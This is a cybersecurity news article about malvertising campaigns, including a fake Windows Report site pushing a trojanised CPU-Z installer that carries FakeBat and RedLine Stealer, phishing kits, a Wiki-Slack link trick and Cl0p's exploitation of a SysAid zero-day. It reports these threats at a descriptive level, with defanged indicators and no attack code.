In a recent cybersecurity revelation, a sophisticated malvertising campaign has emerged, deploying fake websites that convincingly emulate a legitimate Windows news portal.
The primary objective? To disseminate a corrupted installer camouflaged as a popular system profiling tool—CPU-Z.
A Deviation from the Norm
Unlike typical malvertising tactics that create replicas of well-known software sites, this campaign takes a bold departure. The imitated website resembles WindowsReport[.]com, aiming to dupe users searching for CPU-Z on significant search engines, notably Google.
The attackers employ cunningly crafted ads that, once clicked, redirect unsuspecting users to a deceptive portal (workspace-app[.]online).
Simultaneously, those outside the campaign’s crosshairs encounter a seemingly harmless blog—a clever cloaking technique to avoid detection.
Behind the Scenes: Unpacking the Malicious Payload
The nefarious payload resides in a signed MSI installer hosted on the deceitful website. A malicious PowerShell script is concealed, acting as a loader dubbed FakeBat (or EugenLoader).
This loader facilitates the deployment of RedLine Stealer on the compromised host. Analysts speculate that the choice to replicate the Windows Report site is strategic, given the common user tendency to download software utilities from such portals rather than official sources.
Beyond Isolation: A Wider Landscape of Threats
This incident is not an isolated occurrence. Deceptive Google Ads have repeatedly proven to be a source for malware distribution.
Recently, cybersecurity firm eSentire shed light on an updated Nitrogen campaign, demonstrating how similar tactics paved the way for a BlackCat ransomware onslaught.
Moreover, eSentire documented two additional campaigns leveraging the drive-by download method, directing users to dubious websites and disseminating various malware families, including NetWire RAT, DarkGate, and DanaBot.
Threat actors increasingly turn to sophisticated adversary-in-the-middle (AiTM) phishing kits—NakedPages, Strox, and DadSec—to navigate multi-factor authentication and compromise targeted accounts.
Enter the Wiki-Slack Attack: A Novel Intrusion Method
Adding to the complexity, eSentire unveiled a novel, Wiki—Slack attack method. This user-direction tactic aims to guide victims to an assailant-controlled website by manipulating the end of the first paragraph of a Wikipedia article shared on Slack.
Exploiting a Slack quirk that mishandles whitespace between paragraphs, the attack automatically generates a link when the Wikipedia URL is previewed in the messaging platform.
Cl0p Alert Again: Zero Day Exploit
Microsoft’s recent findings reveal that the threat group Lace Tempest, known for Cl0p ransomware, exploited a zero-day flaw (CVE-2023-47246) in SysAid IT support software.
The flaw allows code execution in on-premise installations. Lace Tempest utilized SysAid to deploy a malware loader for Gracewire, followed by human-operated activities like lateral movement and ransomware deployment.
SysAid has patched the flaw in version 23.3.36. The FBI warns of a rising trend where ransomware attackers use third-party vendors and legitimate tools for data theft and extortion. Organizations using SysAid are urged to apply patches and scan for exploitation signs promptly.
Guardrails Needed: Ethical Considerations and Defensive Measures
Malicious installers, malware, and zero-day exploits will never leave us. With the rise in phishing campaigns, organizations put security measures on their email management, but threat actors have moved to another mode: browser-based social engineering attacks.
It is now essential to know the safety practices to prevent browser-based attacks, SEO poisoning, and malvertisement via Google Ads.
Efficient end-point monitoring is the most crucial aspect we must consider.
Marrium Akhtar
November 10, 2023
6 months ago
